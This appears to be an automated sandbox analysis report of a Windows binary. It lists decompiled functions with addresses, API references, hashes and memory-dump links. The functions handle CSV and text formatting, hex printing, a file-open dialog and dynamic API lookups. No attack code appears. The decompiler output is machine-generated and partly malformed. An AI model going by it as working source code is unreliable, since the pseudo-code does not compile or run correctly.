                                                                                                  C-Code - Quality: 75%
                                                                                                  			E00407362(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                  				signed int _v8;
                                                                                                  				signed int _v12;
                                                                                                  				void* _v16;
                                                                                                  				wchar_t* _v20;
                                                                                                  				intOrPtr _v24;
                                                                                                  				intOrPtr _v28;
                                                                                                  				intOrPtr _v32;
                                                                                                  				char _v36;
                                                                                                  				void* __edi;
                                                                                                  				signed int _t39;
                                                                                                  				wchar_t* _t41;
                                                                                                  				signed int _t45;
                                                                                                  				signed int _t48;
                                                                                                  				wchar_t* _t53;
                                                                                                  				wchar_t* _t62;
                                                                                                  				void* _t66;
                                                                                                  				intOrPtr* _t68;
                                                                                                  				void* _t70;
                                                                                                  				wchar_t* _t75;
                                                                                                  				wchar_t* _t79;
                                                                                                  
                                                                                                  				_t66 = __ebx;
                                                                                                  				_t75 = 0;
                                                                                                  				_v8 = 0;
                                                                                                  				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
                                                                                                  					do {
                                                                                                  						_t39 =  *( *((intOrPtr*)(_t66 + 0x30)) + _v8 * 4);
                                                                                                  						_t68 = _a8;
                                                                                                  						if(_t68 != _t75) {
                                                                                                  							_t79 =  *((intOrPtr*)( *_t68))(_t39,  *((intOrPtr*)(_t66 + 0x60)));
                                                                                                  						} else {
                                                                                                  							_t79 =  *( *((intOrPtr*)(_t66 + 0x2d4)) + 0x10 + _t39 * 0x14);
                                                                                                  						}
                                                                                                  						_t41 = wcschr(_t79, 0x2c);
                                                                                                  						_pop(_t70);
                                                                                                  						if(_t41 != 0) {
                                                                                                  							L8:
                                                                                                  							_v20 = _t75;
                                                                                                  							_v28 = _t75;
                                                                                                  							_v36 = _t75;
                                                                                                  							_v24 = 0x100;
                                                                                                  							_v32 = 1;
                                                                                                  							_v16 = 0x22;
                                                                                                  							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
                                                                                                  							while(1) {
                                                                                                  								_t45 =  *_t79 & 0x0000ffff;
                                                                                                  								__eflags = _t45;
                                                                                                  								_v12 = _t45;
                                                                                                  								_t77 =  &_v36;
                                                                                                  								if(__eflags == 0) {
                                                                                                  									break;
                                                                                                  								}
                                                                                                  								__eflags = _t45 - 0x22;
                                                                                                  								if(__eflags != 0) {
                                                                                                  									_push( &_v12);
                                                                                                  									_t48 = 1;
                                                                                                  									__eflags = 1;
                                                                                                  								} else {
                                                                                                  									_push(L"\"\"");
                                                                                                  									_t48 = _t45 | 0xffffffff;
                                                                                                  								}
                                                                                                  								E0040565D(_t48, _t70, _t77, __eflags);
                                                                                                  								_t79 =  &(_t79[0]);
                                                                                                  								__eflags = _t79;
                                                                                                  							}
                                                                                                  							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
                                                                                                  							_t53 = _v20;
                                                                                                  							__eflags = _t53;
                                                                                                  							if(_t53 == 0) {
                                                                                                  								_t53 = 0x40c4e8;
                                                                                                  							}
                                                                                                  							E004055D1(E00407343(_t66, _a4, _t53),  &_v36);
                                                                                                  							_t75 = 0;
                                                                                                  							__eflags = 0;
                                                                                                  						} else {
                                                                                                  							_t62 = wcschr(_t79, 0x22);
                                                                                                  							_pop(_t70);
                                                                                                  							if(_t62 != 0) {
                                                                                                  								goto L8;
                                                                                                  							} else {
                                                                                                  								E00407343(_t66, _a4, _t79);
                                                                                                  							}
                                                                                                  						}
                                                                                                  						if(_v8 <  *((intOrPtr*)(_t66 + 0x2c)) - 1) {
                                                                                                  							E00407343(_t66, _a4, ",");
                                                                                                  						}
                                                                                                  						_v8 = _v8 + 1;
                                                                                                  					} while (_v8 <  *((intOrPtr*)(_t66 + 0x2c)));
                                                                                                  				}
                                                                                                  				return E00407343(_t66, _a4, L"\r\n");
                                                                                                  			}























                                                                                                  0x00407362
                                                                                                  0x00407369
                                                                                                  0x0040736e
                                                                                                  0x00407371
                                                                                                  0x00407378
                                                                                                  0x0040737e
                                                                                                  0x00407381
                                                                                                  0x00407386
                                                                                                  0x0040739f
                                                                                                  0x00407388
                                                                                                  0x00407391
                                                                                                  0x00407391
                                                                                                  0x004073a4
                                                                                                  0x004073ac
                                                                                                  0x004073ad
                                                                                                  0x004073cd
                                                                                                  0x004073d0
                                                                                                  0x004073d3
                                                                                                  0x004073d6
                                                                                                  0x004073e0
                                                                                                  0x004073e7
                                                                                                  0x004073ee
                                                                                                  0x004073f5
                                                                                                  0x0040741a
                                                                                                  0x0040741a
                                                                                                  0x0040741d
                                                                                                  0x00407420
                                                                                                  0x00407423
                                                                                                  0x00407426
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x004073fc
                                                                                                  0x00407400
                                                                                                  0x0040740f
                                                                                                  0x00407412
                                                                                                  0x00407412
                                                                                                  0x00407402
                                                                                                  0x00407402
                                                                                                  0x00407407
                                                                                                  0x00407407
                                                                                                  0x00407413
                                                                                                  0x00407419
                                                                                                  0x00407419
                                                                                                  0x00407419
                                                                                                  0x0040742f
                                                                                                  0x00407434
                                                                                                  0x00407437
                                                                                                  0x00407439
                                                                                                  0x0040743b
                                                                                                  0x0040743b
                                                                                                  0x0040744e
                                                                                                  0x00407453
                                                                                                  0x00407453
                                                                                                  0x004073af
                                                                                                  0x004073b2
                                                                                                  0x004073ba
                                                                                                  0x004073bb
                                                                                                  0x00000000
                                                                                                  0x004073bd
                                                                                                  0x004073c3
                                                                                                  0x004073c3
                                                                                                  0x004073bb
                                                                                                  0x0040745c
                                                                                                  0x00407468
                                                                                                  0x00407468
                                                                                                  0x0040746d
                                                                                                  0x00407473
                                                                                                  0x0040747c
                                                                                                  0x0040748e

                                                                                                  APIs
                                                                                                  • wcschr.MSVCRT ref: 004073A4
                                                                                                  • wcschr.MSVCRT ref: 004073B2
                                                                                                    • Part of subcall function 0040565D: wcslen.MSVCRT ref: 00405679
                                                                                                    • Part of subcall function 0040565D: memcpy.MSVCRT ref: 0040569D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: wcschr$memcpywcslen
                                                                                                  • String ID: "
                                                                                                  • API String ID: 1983396471-123907689
                                                                                                  • Opcode ID: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                                                  • Instruction ID: 00b3f0686b04e7c82e40785714242b478475f00d1c6093d835cc4068bab83974
                                                                                                  • Opcode Fuzzy Hash: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                                                  • Instruction Fuzzy Hash: 4E315F31E04208ABDF10EFA5C8819AE7BB9EF54314F20457BEC50B72C2D778AA41DB59
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 45%
                                                                                                  			E00401676(void* __ecx, intOrPtr* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                  				char _v8;
                                                                                                  				intOrPtr _v12;
                                                                                                  				char _v80;
                                                                                                  				signed short _v65616;
                                                                                                  				void* _t27;
                                                                                                  				intOrPtr _t28;
                                                                                                  				void* _t34;
                                                                                                  				intOrPtr _t39;
                                                                                                  				intOrPtr* _t51;
                                                                                                  				void* _t52;
                                                                                                  
                                                                                                  				_t51 = __esi;
                                                                                                  				E0040B550(0x1004c, __ecx);
                                                                                                  				_t39 = 0;
                                                                                                  				_push(0);
                                                                                                  				_push( &_v8);
                                                                                                  				_v8 =  *((intOrPtr*)(_a4 + 0x1c));
                                                                                                  				_push(L"Lines");
                                                                                                  				_t27 =  *((intOrPtr*)( *__esi))();
                                                                                                  				if(_v8 > 0) {
                                                                                                  					do {
                                                                                                  						_t6 = _t39 + 1; // 0x1
                                                                                                  						_t28 = _t6;
                                                                                                  						_push(_t28);
                                                                                                  						_push(L"Line%d");
                                                                                                  						_v12 = _t28;
                                                                                                  						_push(0x1f);
                                                                                                  						_push( &_v80);
                                                                                                  						L0040B1EC();
                                                                                                  						_t52 = _t52 + 0x10;
                                                                                                  						_push(0x7fff);
                                                                                                  						_push(0x40c4e8);
                                                                                                  						if( *((intOrPtr*)(_t51 + 4)) == 0) {
                                                                                                  							_v65616 = _v65616 & 0x00000000;
                                                                                                  							 *((intOrPtr*)( *_t51 + 0x10))( &_v80,  &_v65616);
                                                                                                  							_t34 = E004054DF(_a4, _t51,  &_v65616);
                                                                                                  						} else {
                                                                                                  							_t34 =  *((intOrPtr*)( *_t51 + 0x10))( &_v80, E00405581(_a4, _t39));
                                                                                                  						}
                                                                                                  						_t39 = _v12;
                                                                                                  					} while (_t39 < _v8);
                                                                                                  					return _t34;
                                                                                                  				}
                                                                                                  				return _t27;
                                                                                                  			}













                                                                                                  0x00401676
                                                                                                  0x0040167e
                                                                                                  0x0040168a
                                                                                                  0x0040168c
                                                                                                  0x00401690
                                                                                                  0x00401691
                                                                                                  0x00401696
                                                                                                  0x0040169d
                                                                                                  0x004016a2
                                                                                                  0x004016aa
                                                                                                  0x004016aa
                                                                                                  0x004016aa
                                                                                                  0x004016ad
                                                                                                  0x004016ae
                                                                                                  0x004016b3
                                                                                                  0x004016b9
                                                                                                  0x004016bb
                                                                                                  0x004016bc
                                                                                                  0x004016c1
                                                                                                  0x004016c8
                                                                                                  0x004016cd
                                                                                                  0x004016ce
                                                                                                  0x004016ea
                                                                                                  0x004016ff
                                                                                                  0x0040170c
                                                                                                  0x004016d0
                                                                                                  0x004016e3
                                                                                                  0x004016e3
                                                                                                  0x00401711
                                                                                                  0x00401714
                                                                                                  0x00000000
                                                                                                  0x00401719
                                                                                                  0x0040171c

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: _snwprintf
                                                                                                  • String ID: Line%d$Lines
                                                                                                  • API String ID: 3988819677-2790224864
                                                                                                  • Opcode ID: c1f721086df18e7d6bb8eccb45024a01d2e3fe78f3e8b8c51705c1ae483569b9
                                                                                                  • Instruction ID: 1021665491e9d2d06496d958327cd8fefc515fbb55266dd5f91e98284186a054
                                                                                                  • Opcode Fuzzy Hash: c1f721086df18e7d6bb8eccb45024a01d2e3fe78f3e8b8c51705c1ae483569b9
                                                                                                  • Instruction Fuzzy Hash: 4C110071A00208EFCB15DF98C8C1D9EB7B9EF48704F1045BAF645E7281D778AA458B68
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 70%
                                                                                                  			E0040512F(intOrPtr _a4, intOrPtr _a8, void* _a12) {
                                                                                                  				void* _v8;
                                                                                                  				void* _v26;
                                                                                                  				void _v28;
                                                                                                  				void* _t24;
                                                                                                  				void* _t25;
                                                                                                  				void* _t35;
                                                                                                  				signed int _t38;
                                                                                                  				signed int _t42;
                                                                                                  				void* _t44;
                                                                                                  				void* _t45;
                                                                                                  
                                                                                                  				_t24 = _a12;
                                                                                                  				_t45 = _t44 - 0x18;
                                                                                                  				_t42 = 0;
                                                                                                  				 *_t24 = 0;
                                                                                                  				if(_a8 <= 0) {
                                                                                                  					_t25 = 0;
                                                                                                  				} else {
                                                                                                  					_t38 = 0;
                                                                                                  					_t35 = 0;
                                                                                                  					if(_a8 > 0) {
                                                                                                  						_v8 = _t24;
                                                                                                  						while(1) {
                                                                                                  							_v28 = _v28 & 0x00000000;
                                                                                                  							asm("stosd");
                                                                                                  							asm("stosd");
                                                                                                  							asm("stosd");
                                                                                                  							asm("stosd");
                                                                                                  							asm("stosw");
                                                                                                  							_push( *(_t35 + _a4) & 0x000000ff);
                                                                                                  							_push(L"%2.2X ");
                                                                                                  							_push(0xa);
                                                                                                  							_push( &_v28);
                                                                                                  							L0040B1EC();
                                                                                                  							_t38 = _t42;
                                                                                                  							memcpy(_v8,  &_v28, 6);
                                                                                                  							_t13 = _t42 + 3; // 0x3
                                                                                                  							_t45 = _t45 + 0x1c;
                                                                                                  							if(_t13 >= 0x2000) {
                                                                                                  								break;
                                                                                                  							}
                                                                                                  							_v8 = _v8 + 6;
                                                                                                  							_t35 = _t35 + 1;
                                                                                                  							_t42 = _t42 + 3;
                                                                                                  							if(_t35 < _a8) {
                                                                                                  								continue;
                                                                                                  							}
                                                                                                  							break;
                                                                                                  						}
                                                                                                  						_t24 = _a12;
                                                                                                  					}
                                                                                                  					 *(_t24 + 4 + _t38 * 2) =  *(_t24 + 4 + _t38 * 2) & 0x00000000;
                                                                                                  					_t25 = 1;
                                                                                                  				}
                                                                                                  				return _t25;
                                                                                                  			}













                                                                                                  0x00405132
                                                                                                  0x00405135
                                                                                                  0x00405139
                                                                                                  0x0040513e
                                                                                                  0x00405141
                                                                                                  0x004051b3
                                                                                                  0x00405143
                                                                                                  0x00405145
                                                                                                  0x00405147
                                                                                                  0x0040514c
                                                                                                  0x0040514e
                                                                                                  0x00405151
                                                                                                  0x00405151
                                                                                                  0x0040515b
                                                                                                  0x0040515c
                                                                                                  0x0040515d
                                                                                                  0x0040515e
                                                                                                  0x0040515f
                                                                                                  0x00405168
                                                                                                  0x00405169
                                                                                                  0x00405171
                                                                                                  0x00405173
                                                                                                  0x00405174
                                                                                                  0x00405182
                                                                                                  0x00405184
                                                                                                  0x00405189
                                                                                                  0x0040518c
                                                                                                  0x00405194
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00405196
                                                                                                  0x0040519a
                                                                                                  0x0040519b
                                                                                                  0x004051a1
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x004051a1
                                                                                                  0x004051a3
                                                                                                  0x004051a3
                                                                                                  0x004051a6
                                                                                                  0x004051af
                                                                                                  0x004051b0
                                                                                                  0x004051b7

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: _snwprintfmemcpy
                                                                                                  • String ID: %2.2X
                                                                                                  • API String ID: 2789212964-323797159
                                                                                                  • Opcode ID: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                                                  • Instruction ID: b76e4bbe2d26c53343c630e3245d096d82678977124e835a89109146ed91de65
                                                                                                  • Opcode Fuzzy Hash: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                                                  • Instruction Fuzzy Hash: 5A11A532900608BFEB01DFE8C882AAF77B9FB45314F104477ED14EB141D6789A058BD5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 43%
                                                                                                  			E004075BB(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                  				char _v44;
                                                                                                  				intOrPtr _t22;
                                                                                                  				signed int _t30;
                                                                                                  				signed int _t34;
                                                                                                  				void* _t35;
                                                                                                  				void* _t36;
                                                                                                  
                                                                                                  				_t35 = __esi;
                                                                                                  				_t34 = 0;
                                                                                                  				if( *((intOrPtr*)(__esi + 0x2c)) > 0) {
                                                                                                  					do {
                                                                                                  						_t30 =  *( *((intOrPtr*)(__esi + 0x30)) + _t34 * 4);
                                                                                                  						_t22 =  *((intOrPtr*)(_t30 * 0x14 +  *((intOrPtr*)(__esi + 0x40)) + 0xc));
                                                                                                  						L0040B1EC();
                                                                                                  						_push( *((intOrPtr*)( *_a8))(_t30,  *((intOrPtr*)(__esi + 0x64)),  &_v44, 0x14, L"%%-%d.%ds ", _t22, _t22));
                                                                                                  						_push( &_v44);
                                                                                                  						_push(0x2000);
                                                                                                  						_push( *((intOrPtr*)(__esi + 0x60)));
                                                                                                  						L0040B1EC();
                                                                                                  						_t36 = _t36 + 0x24;
                                                                                                  						E00407343(__esi, _a4,  *((intOrPtr*)(__esi + 0x60)));
                                                                                                  						_t34 = _t34 + 1;
                                                                                                  					} while (_t34 <  *((intOrPtr*)(__esi + 0x2c)));
                                                                                                  				}
                                                                                                  				return E00407343(_t35, _a4, L"\r\n");
                                                                                                  			}









                                                                                                  0x004075bb
                                                                                                  0x004075c2
                                                                                                  0x004075c7
                                                                                                  0x004075ca
                                                                                                  0x004075cd
                                                                                                  0x004075d8
                                                                                                  0x004075e9
                                                                                                  0x004075fc
                                                                                                  0x00407600
                                                                                                  0x00407601
                                                                                                  0x00407606
                                                                                                  0x00407609
                                                                                                  0x0040760e
                                                                                                  0x00407619
                                                                                                  0x0040761e
                                                                                                  0x0040761f
                                                                                                  0x00407624
                                                                                                  0x00407636

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: _snwprintf
                                                                                                  • String ID: %%-%d.%ds
                                                                                                  • API String ID: 3988819677-2008345750
                                                                                                  • Opcode ID: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                                                  • Instruction ID: ecb877ded915dbad8d5af0e436ed4e240226c92ce5a1c47ab2288d53f8dcf9da
                                                                                                  • Opcode Fuzzy Hash: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                                                  • Instruction Fuzzy Hash: BC01B931600704AFD7109F69CC82D5A77ADFF48304B004439FD86B7292D635F911DBA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E0040507A(intOrPtr __eax, wchar_t* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                  				intOrPtr _v20;
                                                                                                  				intOrPtr _v28;
                                                                                                  				intOrPtr _v32;
                                                                                                  				intOrPtr _v36;
                                                                                                  				intOrPtr _v44;
                                                                                                  				intOrPtr _v48;
                                                                                                  				wchar_t* _v52;
                                                                                                  				intOrPtr _v56;
                                                                                                  				intOrPtr _v64;
                                                                                                  				intOrPtr _v68;
                                                                                                  				intOrPtr _v76;
                                                                                                  				struct tagOFNA _v80;
                                                                                                  
                                                                                                  				_v76 = __eax;
                                                                                                  				_v68 = _a4;
                                                                                                  				_v64 = 0;
                                                                                                  				_v44 = 0;
                                                                                                  				_v36 = 0;
                                                                                                  				_v32 = _a8;
                                                                                                  				_v20 = _a12;
                                                                                                  				_v80 = 0x4c;
                                                                                                  				_v56 = 1;
                                                                                                  				_v52 = __esi;
                                                                                                  				_v48 = 0x104;
                                                                                                  				_v28 = 0x81804;
                                                                                                  				if(GetOpenFileNameW( &_v80) == 0) {
                                                                                                  					return 0;
                                                                                                  				} else {
                                                                                                  					wcscpy(__esi, _v52);
                                                                                                  					return 1;
                                                                                                  				}
                                                                                                  			}















                                                                                                  0x00405080
                                                                                                  0x00405086
                                                                                                  0x0040508b
                                                                                                  0x0040508e
                                                                                                  0x00405091
                                                                                                  0x00405097
                                                                                                  0x0040509d
                                                                                                  0x004050a4
                                                                                                  0x004050ab
                                                                                                  0x004050b2
                                                                                                  0x004050b5
                                                                                                  0x004050bc
                                                                                                  0x004050cb
                                                                                                  0x004050e0
                                                                                                  0x004050cd
                                                                                                  0x004050d1
                                                                                                  0x004050dc
                                                                                                  0x004050dc

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: FileNameOpenwcscpy
                                                                                                  • String ID: L
                                                                                                  • API String ID: 3246554996-2909332022
                                                                                                  • Opcode ID: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                                                  • Instruction ID: bc55e530e402ba4b599a228f817f204aa1fc4279979982f23bca087f07049b97
                                                                                                  • Opcode Fuzzy Hash: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                                                  • Instruction Fuzzy Hash: 9A015FB1D102199FDF40DFA9D885ADEBBF4BB08304F14812AE915F6240E77495458F98
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 58%
                                                                                                  			E0040906D(struct HINSTANCE__** __eax, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                  				void* __esi;
                                                                                                  				_Unknown_base(*)()* _t10;
                                                                                                  				void* _t12;
                                                                                                  				struct HINSTANCE__** _t13;
                                                                                                  
                                                                                                  				_t13 = __eax;
                                                                                                  				_t12 = 0;
                                                                                                  				if(E00408F72(__eax) != 0) {
                                                                                                  					_t10 = GetProcAddress( *_t13, "LookupAccountSidW");
                                                                                                  					if(_t10 != 0) {
                                                                                                  						_t12 =  *_t10(0, _a4, _a8, _a12, _a16, _a20, _a24);
                                                                                                  					}
                                                                                                  				}
                                                                                                  				return _t12;
                                                                                                  			}







                                                                                                  0x00409072
                                                                                                  0x00409074
                                                                                                  0x0040907d
                                                                                                  0x00409086
                                                                                                  0x0040908e
                                                                                                  0x004090a5
                                                                                                  0x004090a5
                                                                                                  0x0040908e
                                                                                                  0x004090ac

                                                                                                  APIs
                                                                                                  • GetProcAddress.KERNEL32(?,LookupAccountSidW), ref: 00409086
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc
                                                                                                  • String ID: LookupAccountSidW$Y@
                                                                                                  • API String ID: 190572456-2352570548
                                                                                                  • Opcode ID: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                                                  • Instruction ID: 3ebfd29b958db2e29df2983e37ea976ab6b1d16e8490ad6d4f073a9de280f7a1
                                                                                                  • Opcode Fuzzy Hash: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                                                  • Instruction Fuzzy Hash: F5E0E537100109BBDF125E96DD01CAB7AA79F84750B144035FA54E1161D6368821A794
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 37%
                                                                                                  			E0040AD85(intOrPtr _a4) {
                                                                                                  				_Unknown_base(*)()* _t3;
                                                                                                  				void* _t7;
                                                                                                  				struct HINSTANCE__* _t8;
                                                                                                  				char** _t9;
                                                                                                  
                                                                                                  				_t7 = 0;
                                                                                                  				_t8 = E00405436(L"shlwapi.dll");
                                                                                                  				 *_t9 = "SHAutoComplete";
                                                                                                  				_t3 = GetProcAddress(_t8, ??);
                                                                                                  				if(_t3 != 0) {
                                                                                                  					_t7 =  *_t3(_a4, 0x10000001);
                                                                                                  				}
                                                                                                  				FreeLibrary(_t8);
                                                                                                  				return _t7;
                                                                                                  			}







                                                                                                  0x0040ad8c
                                                                                                  0x0040ad93
                                                                                                  0x0040ad95
                                                                                                  0x0040ad9d
                                                                                                  0x0040ada5
                                                                                                  0x0040adb2
                                                                                                  0x0040adb2
                                                                                                  0x0040adb5
                                                                                                  0x0040adbf

                                                                                                  APIs
                                                                                                    • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                    • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                  • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: Library$Load$AddressFreeProcmemsetwcscat
                                                                                                  • String ID: shlwapi.dll
                                                                                                  • API String ID: 4092907564-3792422438
                                                                                                  • Opcode ID: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
                                                                                                  • Instruction ID: 3ba04cc2888c968bb17b12a51753cff707eeab9003a5d350ca2caef87bad7666
                                                                                                  • Opcode Fuzzy Hash: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
                                                                                                  • Instruction Fuzzy Hash: E1D01235211111EBD7616B66AD44A9F7AA6DFC1351B060036F544F2191DB3C4846C669
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00406597(wchar_t* __esi) {
                                                                                                  				wchar_t* _t2;
                                                                                                  				wchar_t* _t6;
                                                                                                  
                                                                                                  				_t6 = __esi;
                                                                                                  				E00404AD9(__esi);
                                                                                                  				_t2 = wcsrchr(__esi, 0x2e);
                                                                                                  				if(_t2 != 0) {
                                                                                                  					 *_t2 =  *_t2 & 0x00000000;
                                                                                                  				}
                                                                                                  				return wcscat(_t6, L"_lng.ini");
                                                                                                  			}





                                                                                                  0x00406597
                                                                                                  0x00406598
                                                                                                  0x004065a0
                                                                                                  0x004065aa
                                                                                                  0x004065ac
                                                                                                  0x004065ac
                                                                                                  0x004065bd

                                                                                                  APIs
                                                                                                    • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                  • wcsrchr.MSVCRT ref: 004065A0
                                                                                                  • wcscat.MSVCRT ref: 004065B6
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: FileModuleNamewcscatwcsrchr
                                                                                                  • String ID: _lng.ini
                                                                                                  • API String ID: 383090722-1948609170
                                                                                                  • Opcode ID: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
                                                                                                  • Instruction ID: e4456dc4ef972d75cd366ed24565615e7e819105f92635e6590d4ece6e8d8120
                                                                                                  • Opcode Fuzzy Hash: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
